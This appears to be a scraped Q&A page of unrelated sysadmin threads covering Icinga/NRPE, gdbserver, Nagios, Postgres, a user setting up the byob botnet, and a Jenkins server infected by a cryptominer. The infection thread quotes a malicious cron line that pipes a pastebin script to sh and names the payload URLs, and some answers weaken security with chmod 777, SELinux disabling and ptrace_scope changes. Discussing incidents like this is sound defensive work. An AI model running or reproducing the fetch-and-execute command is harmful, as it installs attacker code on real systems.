Icinga check_jboss "NRPE: unable to read output" - monitoring

I'm using Icinga to monitor some servers and services. Most of them run fine. But now I like to monitor a JBoss-AS on one server via NRPE. Therefore I'm using the check_jboss-Plugin from MonitoringExchange. Although each time I try running a test-command from my Icinga-Server via NRPE I'm getting a NRPE: unable to read output error. When I try executing the command directly on the monitored server it runs fine. It's strange that the execution on the monitored server takes around 5 seconds to return a acceptable result but the NRPE-Exceution returns immediately the error. Trying to set up the NRPE-timeout didn't solve the problem. I also checked the permissions of the check_jboss-plugin and set them to "777" so that there should be no error.
I don't think that there's a common issue with NRPE, because there are also some other checks (e.g. check_load, check_disk, ...) via NRPE and they are all running fine. The permissions of these plugins are analog to my check_jboss-Plugin.
Following one sample exceuction on the monitored server which runs fine:
/usr/lib64/nagios/plugins/check_jboss.pl -T ServerInfo -J jboss.system -a MaxMemory -w 3000: -c 2000: -f
JBOSS OK - MaxMemory is 4049076224 | MaxMemory=4049076224
Here are two command-executions via NRPE from my Icinga-Server. Both commands are correctly
./check_nrpe -H xxx.xxx.xxx.xxx -c check_hda1
DISK OK - free space: / 47452 MB (76% inode=97%);| /=14505MB;52218;58745;0;65273
./check_nrpe -H xxx.xxx.xxx.xxx -c jboss_MaxMemory
NRPE: Unable to read output
Does anyone have a hint for me? If further config-information needed please ask :)

Try to rule out SELinux either by disabling it globally or by changing the SELinux type to nagios_unconfined_plugin_exec_t.

Related

How do I resolve this OSError: [Erno 48] Address already in use error while working with the byob botnet on GitHub?

(I have seen other solutions to "Errno 48" issues on StackOverflow, but none have been successful yet.)
I am trying to develop a botnet using byob on github here: https://github.com/malwaredllc/byob
I am encountering a address in use error every time I run the command sudo ./startup.sh. It returns OSError: [Errno 48] Address already in use.
However when I attempt to use the ps -fA | grep python and kill the associated 502 18126 16973 0 9:16PM ttys000 0:00.00 grep python by using kill -9 181216, I get this error: kill: kill 18126 failed: no such process.
Does anyone have any idea what to do?
I am using a "MacOS M1Pro Chip OS V12.0.1 Monterey". Also the program byob is trying to run on port 5000 of IPv4 127.0.0.1 (this is a generic IP not specifically mine). http://127.0.0.1/5000.
In case you try to duplicate the problem you need to install docker.io or the docker desktop app depending on os then navigate to cd <outer-dir>/byob-master/web-gui then execute sudo ./startup.sh. The code will not work without access to docker, and the program needs to be ran with admin perms using the prefix sudo. The actual downloads take a while and it will prompt you to restart once. Then when you run it again, I encounter this problem...
Please let me know if someone was able to fix this. Thanks!

gdbserver does not attach to a running process in a docker container

In my docker container (based on SUSE distribution SLES 15) both the C++ executable (with debug enhanced code) and the gdbserver executable are installed.
Before doing anything productive the C++ executable sleeps for 5 seconds, then initializes and processes data from a database. The processing time is long enough to attach it to gdbserver.
The C++ executable is started in the background and its process id is returned to the console.
Immediately afterwards the gdbserver is started and attaches to the same process id.
Problem: The gdbserver complains not being able to connect to the process:
Cannot attach to lwp 59: No such file or directory (2)
Exiting
In another attempt, I have copied the same gdbserver executable to /tmp in the docker container.
Starting this gdbserver gave a different error response:
Cannot attach to process 220: Operation not permitted (1)
Exiting
It has been verified, that in both cases the process is still running. 'ps -e' clearly shows the process id and the process name.
If the process is already finished, a different error message is thrown; this is clear and needs not be explained:
gdbserver: unable to open /proc file '/proc/79/status'
The gdbserver was started once from outside of the container and once from inside.
In both scenarios the gdbserver refused to attach the running process:
$ kubectl exec -it POD_NAME --container debugger -- gdbserver --attach :44444 59
Cannot attach to lwp 59: No such file or directory (2)
Exiting
$ kubectl exec -it POD_NAME -- /bin/bash
bash-4.4$ cd /tmp
bash-4.4$ ./gdbserver 10.0.2.15:44444 --attach 220
Cannot attach to process 220: Operation not permitted (1)
Exiting
Can someone explain what causes gdbserver refusing to attach to the specified process
and give advice how to overcome the mismatch, i.e. where/what do I need to examine for to prepare the right handshake between the C++ executable and the gdbserver?
The basic reason why gdbserver could not attach to the running C++ process is due to
a security enhancement in Ubuntu (versions >= 10.10):
By default, process A cannot trace a running process B unless B is a direct child of A
(or A runs as root).
Direct debugging is still always allowed, e.g. gdb EXE and strace EXE.
The restriction can be loosen by changing the value of /proc/sys/kernel/yama/ptrace_scope from 1 (=default) to 0 (=tracing allowed for all processes). The security setting can be changed with:
echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope
All credits for the description of ptrace scope belong to the following post,
see 2nd answer by Eliah Kagan - thank you for the thorough explanation! - here:
https://askubuntu.com/questions/143561/why-wont-strace-gdb-attach-to-a-process-even-though-im-root

Jenkins High CPU Usage Khugepageds

So the picture above shows a command khugepageds that is using 98 to 100 % of CPU at times.
I tried finding how does jenkins use this command or what to do about it but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When i pkill ofcourse the usage goes down but once restart its back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill to process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability, thanks to pittss's we were able to detect a bit more about that.
You should check the /var/logs/syslogs for the curl pastebin script which seems to start a corn process on the system, it will try to again escalated access to /tmp folder and install unwanted packages/script.
You should remove everything from the /tmp folder, stop jenkins, check cron process and remove the ones that seem suspicious, restart the VM.
Since the above vulnerability adds unwanted executable at /tmp foler and it tries to access the VM via ssh.
This vulnerability also added a cron process on your system beware to remove that as well.
Also check the ~/.ssh folder for known_hosts and authorized_keys for any suspicious ssh public keys. The attacker can add their ssh keys to get access to your system.
Hope this helps.
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
Contains two parts: shell script from https://pastebin.com/raw/xmxHzu5P and x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/viruses/botnet agents, downloads and spawns the binary from /tmp/kerberods and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary of size 3395072 and date Apr 5 16:19 is packed with the LSD executable packer (http://lsd.dg.com). I haven't still examined what it does. Looks like a botnet controller.
it seem like vulnerability. try look syslog (/var/log/syslog, not jenkinks log) about like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If that, try stop jenkins, clear /tmp dir and kill all pids started with jenkins user.
After if cpu usage down, try update to last tls version of jenkins. Next after start jenkins update all plugins in jenkins.
A solution that works, because the cron file just gets recreated is to empty jenkins' cronfile, I also changed the ownership, and also made the file immutable.
This finally stopped this process from kicking in..
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the Khugepageds process, since every place I read about this error the given solution was to increase memory.
Problem was solved with #HeffZilla solution.

Nagios return status unknow

I install Nagios on CentOS to monitor some servers, and one of them is a TSM server.
I download a plugin written in bash when i execute it in command line it works.
/usr/lib64/nagios/plugins/check_tsm db -v6
db - database utilization 42%, OK
and the return code of the batch script is 0 ( from the command echo $? )
So the script work fine, and return 0 that mean a OK status in nagios, but the status still unknown, I really don't know why.
And i check logs in nagios, etc. It's not a problem of commands definition in commands.cfg or the declaration of service, because I copy the command that nagios send automatically every 5 min and the command works fine in command line, but still unknow status.
Definition of command:
define command{
command_name check_tsm_v6
command_line /usr/lib64/nagios/plugins/check_tsm $ARG1$ -v6 $ARG2$ $ARG3$
}
Service declaration :
define service{
use generic-service
host_name tsm-test
service_description database utilization
check_command check_tsm_v6!db!85!90
}
And here's the bash script.
One thing that's caught me out in the past with Nagios scripts is user rights. When testing your script directly on the command line be sure to precede it with:
sudo -u nagios
So yours would be:
sudo -u nagios /usr/lib64/nagios/plugins/check_tsm db -v6
This assumes that your nagios instance is being run by the nagios user, which is a fairly safe bet.
Good luck
Brad
Try to use yum install sysstat -y command to download the package.
If it work that will a great. If you are facing still same please upload the complete error which is showing in browser?

Postgres Server error -> PGError: could not connect to server

I get the error below when trying to start my rails app on the localhost:
PGError (could not connect to server: No such file or directory
Is the server running locally and accepting
connections on Unix domain socket "/tmp/.s.PGSQL.5432"?
From what I have read it sounds like this is most likely a problem in connecting to the Postgres server, and may indicate that it is not started?
It all started when I was attempting my first (yay noobs!) merge using git. There was a conflict (having to do with the Rubymine workspace.xml file), and I started to open up a conflict resolution program. It then seemed that there was really no need to track workspace.xml at all and so I quit from the resolution program, intending to run "git rm --cached" on the file. I think in quitting the program something went foul, and I ended up restarting, before untracking the file, and then completing the merge. Further evidence that something was gummed up is that my terminal shell didn't open up correctly until I restarted the machine.
Now, as far as I can tell, everything in the merge went fine (there were trivial differences in the two branches anyway), but for the life of me I can't seem to get rid of this PGError. If it is as simple as starting the server, then I'd love help on how to do that.
(other context: OSx, rails 3, posgresql83 installed via macports, pg gem).
EDIT - I have been trying to start up the server, but am not succeeding. e.g., I tried:
pg_ctl start -D /opt/local/var/db/postgresql83/defaultdb
This seems to be the right path for the data (it finds the postgresql.conf file) but the response I get is "cannot execute binary file."
Try sudo port load postgresql83-server - this should work with the latest 8.3 port from macports.
If this doesn't work, try sudo port selfupdate; sudo port upgrade outdated and then try again.
Note - this may take absolutely ages.
and may indicate that it is not started?
Yes, sounds like the server is not running on your local machine.
See the description of this error in the PostgreSQL manual:
http://www.postgresql.org/docs/8.3/static/server-start.html#CLIENT-CONNECTION-PROBLEMS
To start the server, try something along the following lines (adjust for pgsql version # and logfile):
sudo su postgres -c '/opt/local/lib/postgresql84/bin/pg_ctl -D /opt/local/var/db/postgresql8/defaultdb -l /opt/local/var/log/postgresql84/postgres.log start'
To stop the server,
sudo su postgres -c '/opt/local/lib/postgresql84/bin/pg_ctl -D /opt/local/var/db/postgresql84/defaultdb stop'

Resources